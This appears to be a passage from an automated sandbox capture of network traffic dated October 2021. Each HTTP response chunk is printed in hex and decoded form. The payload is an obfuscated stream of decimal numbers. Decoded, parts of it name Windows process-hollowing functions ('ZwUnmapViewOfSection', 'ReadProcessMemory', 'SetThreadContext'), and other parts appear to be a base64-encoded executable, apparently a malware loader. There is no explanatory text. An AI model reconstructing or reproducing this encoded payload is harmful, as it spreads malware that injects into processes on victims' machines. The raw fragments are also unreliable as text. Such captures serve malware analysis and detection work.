                    2021-10-26 16:59:18 UTC1026INData Raw: 33 36 20 31 36 33 20 31 33 32 20 32 33 36 20 31 36 33 20 31 36 36 20 32 33 36 20 31 36 33 20 31 38 36 20 32 33 36 20 31 36 33 20 31 35 30 20 32 33 36 20 31 36 33 20 31 33 38 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 34 20 31 33 35 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 37 38 20 32 33 36 20 31 36 33 20 31 33 32 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 33 30 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 38 38 20 30 20 32 32 37 20 31 36 34 20 31 38 39 20 32 32 37 20 31 36 34 20 31 35 32 20 32 32 37 20 31 36 34 20 31 36 38 20 32 32 37 20 31 36 34 20 31 38 36 20 32 32 37 20 31 36 34 20 31 38 38 20 32 32 37 20 31 36 34 20 31 34 32 20 32 32
                    Data Ascii: 36 163 132 236 163 166 236 163 186 236 163 150 236 163 138 236 163 133 236 164 135 236 163 137 236 163 178 236 163 132 236 163 133 236 163 137 236 163 130 236 163 137 236 163 188 0 227 164 189 227 164 152 227 164 168 227 164 186 227 164 188 227 164 142 22
                    2021-10-26 16:59:18 UTC1027INData Raw: 32 33 34 20 31 38 31 20 31 34 34 20 32 33 34 20 31 38 31 20 31 34 35 20 32 33 34 20 31 38 31 20 31 34 34 20 32 33 34 20 31 38 31 20 31 35 36 20 32 33 34 20 31 38 31 20 31 38 39 20 32 33 34 20 31 38 31 20 31 37 38 20 32 33 34 20 31 38 31 20 31 38 38 20 30 20 32 30 37 20 31 37 32 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 38 20 32 30 37 20 31 37 34 20 32 30 38 20 31 34 38 20 32 30 38 20 31 33 37 20 32 30 38 20 31 35 39 20 32 30 38 20 31 33 39 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 35 20 32 30 38 20 31 36 37 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 31 20 32 30 37 20 31 38 38 20 30 20 32 33 32 20 31 33 30 20 31 38 37 20 32 33 32 20 31 32 39 20 31 38 34 20 32 33 32 20 31 33 30 20 31 35 32 20 32 33 32 20 31 32 39 20 31 38 37
                    Data Ascii: 234 181 144 234 181 145 234 181 144 234 181 156 234 181 189 234 181 178 234 181 188 0 207 172 207 172 208 178 207 174 208 148 208 137 208 159 208 139 207 178 207 172 208 175 208 167 207 178 207 171 207 188 0 232 130 187 232 129 184 232 130 152 232 129 187
                    2021-10-26 16:59:18 UTC1029INData Raw: 38 36 20 32 32 38 20 31 35 36 20 31 38 39 20 32 32 38 20 31 35 37 20 31 35 31 20 32 32 38 20 31 35 37 20 31 34 35 20 32 32 38 20 31 35 37 20 31 37 31 20 32 32 38 20 31 35 37 20 31 38 33 20 32 32 38 20 31 35 36 20 31 38 36 20 32 32 38 20 31 35 37 20 31 36 39 20 32 32 38 20 31 35 37 20 31 37 38 20 32 32 38 20 31 35 36 20 31 38 39 20 30 20 32 33 35 20 31 37 35 20 31 37 36 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 35 37 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 36 31 20 32 33 35 20 31 37 34 20 31 38 37 20 32 33 35 20 31 37 35 20 31 38 35 20 32 33 35 20 31 37 35 20 31 33 31 20 32 33 35 20 31 37 35 20 31 35 32 20 32 33 35 20 31 37 35 20 31 35
                    Data Ascii: 86 228 156 189 228 157 151 228 157 145 228 157 171 228 157 183 228 156 186 228 157 169 228 157 178 228 156 189 0 235 175 176 235 175 171 235 175 171 235 175 129 235 175 157 235 175 129 235 175 161 235 174 187 235 175 185 235 175 131 235 175 152 235 175 15
                    2021-10-26 16:59:18 UTC1030INData Raw: 31 39 31 20 31 38 39 20 30 20 32 31 30 20 31 36 32 20 32 31 31 20 31 34 34 20 32 31 30 20 31 36 36 20 32 31 30 20 31 38 39 20 32 31 30 20 31 36 35 20 32 31 30 20 31 34 33 20 32 31 30 20 31 34 31 20 32 31 30 20 31 34 32 20 32 31 30 20 31 34 35 20 32 31 30 20 31 39 31 20 32 31 31 20 31 34 32 20 32 31 30 20 31 34 37 20 32 31 30 20 31 34 30 20 32 31 31 20 31 32 39 20 32 31 30 20 31 38 39 20 30 20 32 31 38 20 31 37 30 20 32 31 37 20 31 38 35 20 32 31 38 20 31 39 30 20 32 31 37 20 31 38 37 20 32 31 37 20 31 38 35 20 32 31 38 20 31 35 36 20 32 31 39 20 31 32 38 20 32 31 38 20 31 34 30 20 32 31 38 20 31 32 38 20 32 31 38 20 31 34 31 20 32 31 37 20 31 38 39 20 32 31 39 20 31 32 38 20 32 31 38 20 31 32 38 20 32 31 37 20 31 38 36 20 32 31 37 20 31 38 39 20 30 20 32
                    Data Ascii: 191 189 0 210 162 211 144 210 166 210 189 210 165 210 143 210 141 210 142 210 145 210 191 211 142 210 147 210 140 211 129 210 189 0 218 170 217 185 218 190 217 187 217 185 218 156 219 128 218 140 218 128 218 141 217 189 219 128 218 128 217 186 217 189 0 2
                    2021-10-26 16:59:18 UTC1031INData Raw: 20 32 32 36 20 31 37 31 20 31 33 35 20 32 32 36 20 31 37 31 20 31 37 30 20 32 32 36 20 31 37 31 20 31 37 32 20 32 32 36 20 31 37 30 20 31 38 34 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 30 20 31 38 37 20 32 32 36 20 31 37 30 20 31 38 38 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 31 20 31 36 37 20 32 32 36 20 31 37 30 20 31 39 30 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 30 20 31 39 30 20 30 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 37 35 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 32 38 20 32 32 34 20 31 37 35 20 31 32 38 20 32 32 34 20 31 37 34 20 31 35 35 20 32 32 34 20 31 37 34 20 31 37 32 20 32 32 34 20 31 37 34 20 31 33 30 20
                    Data Ascii: 226 171 135 226 171 170 226 171 172 226 170 184 226 171 136 226 170 187 226 170 188 226 170 189 226 171 136 226 171 167 226 170 190 226 170 189 226 170 190 0 224 174 131 224 174 175 224 174 131 224 174 128 224 175 128 224 174 155 224 174 172 224 174 130
                    2021-10-26 16:59:18 UTC1032INData Raw: 32 32 38 20 31 39 30 20 31 38 39 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 34 38 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 37 32 20 32 32 38 20 31 39 31 20 31 38 31 20 32 32 38 20 31 39 30 20 31 38 36 20 32 32 38 20 31 39 31 20 31 38 32 20 32 32 38 20 31 39 31 20 31 37 33 20 32 32 38 20 31 39 30 20 31 39 30 20 30 20 32 31 33 20 31 35 36 20 32 31 34 20 31 36 33 20 32 31 33 20 31 36 31 20 32 31 33 20 31 36 34 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 35 20 32 31 34 20 31 33 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 36 20 32 31 33 20 31 36 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 35 39 20 32 31 33 20 31 36 30 20 32 31 33 20 31 39 30 20 30 20 32 32 37 20 31 32 39 20 31 34 33
                    Data Ascii: 228 190 189 228 190 185 228 191 148 228 190 185 228 191 172 228 191 181 228 190 186 228 191 182 228 191 173 228 190 190 0 213 156 214 163 213 161 213 164 213 163 214 145 214 130 213 163 213 163 214 146 213 160 213 163 213 159 213 160 213 190 0 227 129 143
                    2021-10-26 16:59:18 UTC1034INData Raw: 33 32 20 32 33 31 20 31 36 38 20 31 36 37 20 32 33 31 20 31 36 38 20 31 37 34 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 38 20 31 34 32 20 32 33 31 20 31 36 38 20 31 35 39 20 32 33 31 20 31 36 38 20 31 35 30 20 32 33 31 20 31 36 38 20 31 34 39 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 39 20 31 33 30 20 32 33 31 20 31 36 39 20 31 34 35 20 32 33 31 20 31 36 38 20 31 34 36 20 32 33 31 20 31 36 38 20 31 39 31 20 30 20 32 33 31 20 31 36 39 20 31 37 33 20 32 33 31 20 31 36 39 20 31 34 33 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 37 35 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 36 35 20 32 33 31 20 31 36 39 20 31 37 38 20 32 33 31 20 31 36 38 20 31 39
                    Data Ascii: 32 231 168 167 231 168 174 231 169 129 231 168 142 231 168 159 231 168 150 231 168 149 231 169 129 231 169 130 231 169 145 231 168 146 231 168 191 0 231 169 173 231 169 143 231 168 191 231 169 175 231 168 191 231 168 191 231 169 165 231 169 178 231 168 19
                    2021-10-26 16:59:18 UTC1035INData Raw: 20 30 20 31 30 34 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 31 31 36 20 30 20 30 20 33 35 20 38 32 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 38 30 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 39 39 20 30 20 31 30 31 20 30 20 31 31 35 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 32 31 20 30 20 30 20 34 31 20 39 30 20 30 20 31 31 39 20 30 20 38 35 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 39 37 20 30 20 31 31 32 20 30 20 38 36 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 30 32 20 30 20 38 33
                    Data Ascii: 0 104 0 114 0 101 0 97 0 100 0 67 0 111 0 110 0 116 0 101 0 120 0 116 0 0 35 82 0 101 0 97 0 100 0 80 0 114 0 111 0 99 0 101 0 115 0 115 0 77 0 101 0 109 0 111 0 114 0 121 0 0 41 90 0 119 0 85 0 110 0 109 0 97 0 112 0 86 0 105 0 101 0 119 0 79 0 102 0 83
                    2021-10-26 16:59:18 UTC1036INData Raw: 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 69 0 65 0 65 0 65 0 65 0 47 0 47 0 56 0 65 0 65 0 76 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:18 UTC1038INData Raw: 20 31 32 32 20 30 20 37 35 20 30 20 31 30 35 20 30 20 31 30 39 20 30 20 38 32 20 30 20 31 31 35 20 30 20 31 31 39 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 34 20 30 20 39 38 20 30 20 37 37 20 30 20 31 31 33 20 30 20 37 35 20 30 20 39 30 20 30 20 37 31 20 30 20 31 32 32 20 30 20 38 35 20 30 20 31 30 39 20 30 20 31 30 38 20 30 20 31 30 36 20 30 20 39 37 20 30 20 36 37 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 31 30 37 20 30 20 39 38 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 122 0 75 0 105 0 109 0 82 0 115 0 119 0 122 0 118 0 54 0 98 0 77 0 113 0 75 0 90 0 71 0 122 0 85 0 109 0 108 0 106 0 97 0 67 0 115 0 112 0 107 0 98 0 77 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:18 UTC1039INData Raw: 30 20 35 32 20 30 20 37 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20
                    Data Ascii: 0 52 0 73 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 66 0 119 0 119 0 119 0 65 0 65 0 72 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:18 UTC1040INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 37 20 30 20 35 33 20 30 20 31 32 31 20 30 20 39 39 20 30 20 35 31 20 30 20 37 34 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 31 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 5 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 119 0 67 0 53 0 121 0 99 0 51 0 74 0 106 0 65 0 65 0 65 0 65 0 68 0 71 0 69 0 65 0 65 0 65 0 68 0 81 0 65 0 81 0 65 0 65 0 89 0 103 0 65 0 65 0 65 0 79 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:18 UTC1042INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                    Data Ascii: 5 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 6
                    2021-10-26 16:59:18 UTC1043INData Raw: 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 37 20 30 20 37 37 20 30 20 34 37 20 30 20 39 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 34 20 30 20 37 39 20 30 20 37 35 20 30 20 36 36 20 30 20 34 33 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 37 38 20 30 20 36 39 20 30 20 37 34 20 30 20 31 30 39 20 30 20 36 38 20 30 20 35 35 20 30 20 39 38 20 30 20 36 35 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 34 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 38 39 20 30 20 31 32 32 20 30 20 31 31 39 20
                    Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 87 0 76 0 55 0 70 0 70 0 87 0 77 0 47 0 90 0 109 0 105 0 84 0 79 0 75 0 66 0 43 0 115 0 112 0 78 0 69 0 74 0 109 0 68 0 55 0 98 0 65 0 117 0 102 0 73 0 65 0 65 0 65 0 65 0 114 0 122 0 109 0 89 0 122 0 119
                    2021-10-26 16:59:18 UTC1044INData Raw: 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 34 20 30 20 37 33 20 30 20 36 38 20 30 20 35 32 20 30 20 38 35 20 30 20 31 31 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 32 20 30 20 38 39 20 30 20 39 37 20 30 20 37 39 20 30 20 31 31 39 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36
                    Data Ascii: 65 0 65 0 65 0 65 0 43 0 69 0 105 0 119 0 65 0 65 0 65 0 69 0 104 0 73 0 68 0 52 0 85 0 118 0 65 0 103 0 65 0 65 0 105 0 48 0 85 0 81 0 105 0 122 0 51 0 81 0 119 0 85 0 65 0 65 0 68 0 55 0 102 0 89 0 97 0 79 0 119 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 6
                    2021-10-26 16:59:18 UTC1046INData Raw: 30 20 34 38 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 39 20 30 20 31 31 33 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 35 31 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 31 30 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 31 30 33 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 38 20 30 20 31 32 32 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 39 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 30 20 30 20 39 37 20 30 20 36 38 20 30 20 38 30 20 30 20 38 34 20 30 20
                    Data Ascii: 0 48 0 85 0 77 0 100 0 82 0 49 0 113 0 65 0 80 0 56 0 86 0 51 0 77 0 66 0 65 0 65 0 71 0 112 0 110 0 85 0 80 0 56 0 86 0 103 0 77 0 70 0 65 0 65 0 70 0 68 0 47 0 70 0 88 0 122 0 66 0 81 0 65 0 68 0 112 0 99 0 102 0 47 0 47 0 47 0 50 0 97 0 68 0 80 0 84 0
                    2021-10-26 16:59:18 UTC1047INData Raw: 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 35 31 20 30 20 31 31 39 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 39 20 30 20 38 34 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 31 36 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 31 31 32 20 30
                    Data Ascii: 5 0 71 0 97 0 70 0 119 0 65 0 43 0 70 0 113 0 119 0 65 0 65 0 65 0 65 0 43 0 51 0 119 0 86 0 68 0 47 0 100 0 104 0 68 0 47 0 70 0 99 0 84 0 66 0 81 0 65 0 68 0 47 0 116 0 106 0 119 0 69 0 65 0 65 0 68 0 47 0 70 0 86 0 122 0 65 0 81 0 65 0 68 0 112 0 112 0
                    2021-10-26 16:59:18 UTC1048INData Raw: 20 38 36 20 30 20 35 30 20 30 20 31 31 31 20 30 20 34 38 20 30 20 39 37 20 30 20 36 37 20 30 20 36 38 20 30 20 37 34 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 33 20 30 20 31 32 32 20 30 20 35 30 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 37 36 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 35 37 20 30 20 37 32 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 31 31 39 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 38 20 30 20 37 33 20 30 20 35 32 20 30 20 34 39 20 30 20 37 30 20 30 20 35 33 20 30 20 37 30 20 30 20 36 36 20 30 20 38 37 20 30 20 34 37 20 30 20
                    Data Ascii: 86 0 50 0 111 0 48 0 97 0 67 0 68 0 74 0 81 0 65 0 68 0 47 0 100 0 81 0 103 0 122 0 50 0 47 0 56 0 86 0 76 0 77 0 66 0 65 0 65 0 73 0 115 0 57 0 72 0 77 0 66 0 65 0 65 0 73 0 118 0 119 0 104 0 102 0 90 0 48 0 73 0 52 0 49 0 70 0 53 0 70 0 66 0 87 0 47 0
                    2021-10-26 16:59:18 UTC1050INData Raw: 31 32 31 20 30 20 35 32 20 30 20 34 39 20 30 20 34 39 20 30 20 35 34 20 30 20 37 39 20 30 20 31 30 36 20 30 20 35 31 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 34 20 30 20 31 31 31 20 30 20 35 34 20 30 20 37 37 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 37 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 32 20 30 20 38 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 35 20 30 20 35 33 20 30 20 38 38 20 30 20 31
                    Data Ascii: 121 0 52 0 49 0 49 0 54 0 79 0 106 0 51 0 81 0 81 0 65 0 65 0 88 0 49 0 53 0 98 0 121 0 99 0 73 0 69 0 65 0 70 0 78 0 88 0 105 0 47 0 104 0 111 0 54 0 77 0 82 0 65 0 65 0 73 0 80 0 73 0 47 0 43 0 103 0 72 0 81 0 103 0 65 0 65 0 77 0 57 0 115 0 53 0 88 0 1
                    2021-10-26 16:59:18 UTC1051INData Raw: 30 20 31 31 31 20 30 20 37 37 20 30 20 31 30 37 20 30 20 38 33 20 30 20 36 35 20 30 20 36 36 20 30 20 36 36 20 30 20 37 39 20 30 20 35 36 20 30 20 31 31 32 20 30 20 35 36 20 30 20 35 35 20 30 20 35 36 20 30 20 37 38 20 30 20 38 34 20 30 20 38 36 20 30 20 31 30 38 20 30 20 31 30 32 20 30 20 34 37 20 30 20 37 30 20 30 20 39 37 20 30 20 36 38 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 36 20 30 20 35 31 20 30 20 34 33 20 30 20 31 30 33 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 35 37 20 30 20 34 38 20 30 20 37 33 20 30 20 34 33
                    Data Ascii: 0 111 0 77 0 107 0 83 0 65 0 66 0 66 0 79 0 56 0 112 0 56 0 55 0 56 0 78 0 84 0 86 0 108 0 102 0 47 0 70 0 97 0 68 0 65 0 81 0 65 0 67 0 76 0 100 0 67 0 81 0 81 0 105 0 47 0 105 0 76 0 51 0 43 0 103 0 69 0 81 0 65 0 65 0 65 0 104 0 102 0 57 0 48 0 73 0 43
                    2021-10-26 16:59:18 UTC1052INData Raw: 30 20 37 38 20 30 20 38 32 20 30 20 39 38 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 37 38 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 37 39 20 30 20 38 35 20 30 20 39 39 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 30 33 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 35 30 20 30 20 37 33 20 30 20 31 30 38 20 30 20
